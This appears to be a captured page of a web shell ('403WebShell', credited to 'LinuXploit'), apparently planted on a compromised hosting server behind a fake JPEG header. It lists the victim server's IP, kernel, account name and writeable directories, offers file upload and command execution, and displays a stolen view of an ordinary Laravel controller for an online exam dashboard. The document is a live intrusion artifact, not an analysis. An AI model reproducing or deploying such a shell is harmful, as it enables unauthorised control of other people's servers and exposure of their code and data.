����JFIF��x�x����'403WebShell
403Webshell
Server IP : 66.29.137.217  /  Your IP : 52.14.244.195
Web Server : LiteSpeed
System : Linux premium294.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
User : gltevjme ( 1095)
PHP Version : 7.0.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /home/gltevjme/./cbt.bofirm.com/app/Http/Controllers/User/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /home/gltevjme/./cbt.bofirm.com/app/Http/Controllers/User/ExamDashboardController.php
<?php

namespace App\Http\Controllers\User;

use App\Http\Controllers\Controller;
use App\Models\ExamSchedule;
use App\Models\ExamType;
use App\Models\SubCategory;
use App\Settings\LocalizationSettings;
use App\Transformers\Platform\ExamCardTransformer;
use App\Transformers\Platform\ExamScheduleCardTransformer;
use App\Transformers\Platform\ExamTypeTransformer;
use Illuminate\Database\Eloquent\Builder;
use Illuminate\Support\Facades\Cookie;
use Inertia\Inertia;

class ExamDashboardController extends Controller
{
    private LocalizationSettings $localizationSettings;

    public function __construct(LocalizationSettings $localizationSettings)
    {
        $this->middleware(['role:guest|student|employee', 'verify.syllabus']);
        $this->localizationSettings = $localizationSettings;
    }

    /**
     * User's Exam Dashboard
     *
     * @return \Inertia\Response
     */
    public function exam()
    {
        $userGroups = auth()->user()->userGroups()->pluck('id');
        $category = auth()->user()->selectedSyllabus();

        // Fetch exams scheduled for current user via user groups
        $schedules = ExamSchedule::whereHas('userGroups', function (Builder $query) use ($userGroups) {
            $query->whereIn('user_group_id', $userGroups);
        })->whereHas('exam', function (Builder $query) use ($category) {
            $query->where('sub_category_id', '=', $category->id);
        })->with(['exam' => function($builder) {
            $builder->with(['subCategory:id,name', 'examType:id,name']);
        }])->orderBy('end_date', 'asc')->active()->limit(4)->get();

        // Fetch public exams by exam type
        $examTypes = ExamType::active()->orderBy('name')->get();

        return Inertia::render('User/ExamDashboard', [
            'examSchedules' => fractal($schedules, new ExamScheduleCardTransformer())->toArray()['data'],
            'examTypes' => fractal($examTypes, new ExamTypeTransformer())->toArray()['data'],
            'subscription' => request()->user()->hasActiveSubscription($category->id, 'exams')
        ]);
    }

    /**
     * Live Exams Screen
     *
     * @return \Inertia\Response
     */
    public function liveExams()
    {
        $category = auth()->user()->selectedSyllabus();
        return Inertia::render('User/LiveExams', [
            'subscription' => request()->user()->hasActiveSubscription($category->id, 'exams')
        ]);
    }

    /**
     * Fetch live exams api endpoint
     *
     * @return \Illuminate\Http\JsonResponse
     */
    public function fetchLiveExams()
    {
        $userGroups = auth()->user()->userGroups()->pluck('id');
        $category = auth()->user()->selectedSyllabus();

        // Fetch exams scheduled for current user via user groups
        $schedules = ExamSchedule::whereHas('userGroups', function (Builder $query) use ($userGroups) {
            $query->whereIn('user_group_id', $userGroups);
        })->whereHas('exam', function (Builder $query) use ($category) {
            $query->where('sub_category_id', '=', $category->id);
        })->with(['exam' => function($builder) {
            $builder->with(['subCategory:id,name', 'examType:id,name']);
        }])->orderBy('end_date', 'asc')->active()->paginate(10);

        return response()->json([
            'schedules' => fractal($schedules, new ExamScheduleCardTransformer())->toArray()
        ], 200);
    }

    /**
     * Get Exams by type page
     *
     * @param ExamType $type
     * @return \Inertia\Response
     */
    public function examsByType(ExamType $type)
    {
        $category = auth()->user()->selectedSyllabus();
        return Inertia::render('User/ExamsByType', [
            'type' => $type,
            'subscription' => request()->user()->hasActiveSubscription($category->id, 'exams')
        ]);
    }

    /**
     * Fetch exams by type
     *
     * @param ExamType $type
     * @return \Illuminate\Http\JsonResponse
     */
    public function fetchExamsByType(ExamType $type)
    {
        $subCategory = auth()->user()->selectedSyllabus();

        // Fetch public exams by exam type
        $exams = $type->exams()->has('questions')
            ->where('sub_category_id', '=', $subCategory->id)
            ->orderBy('exams.is_paid', 'asc')
            ->with(['subCategory:id,name', 'examType:id,name'])
            ->isPublic()->published()
            ->paginate(10);

        return response()->json([
            'exams' => fractal($exams, new ExamCardTransformer())->toArray(),
        ], 200);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit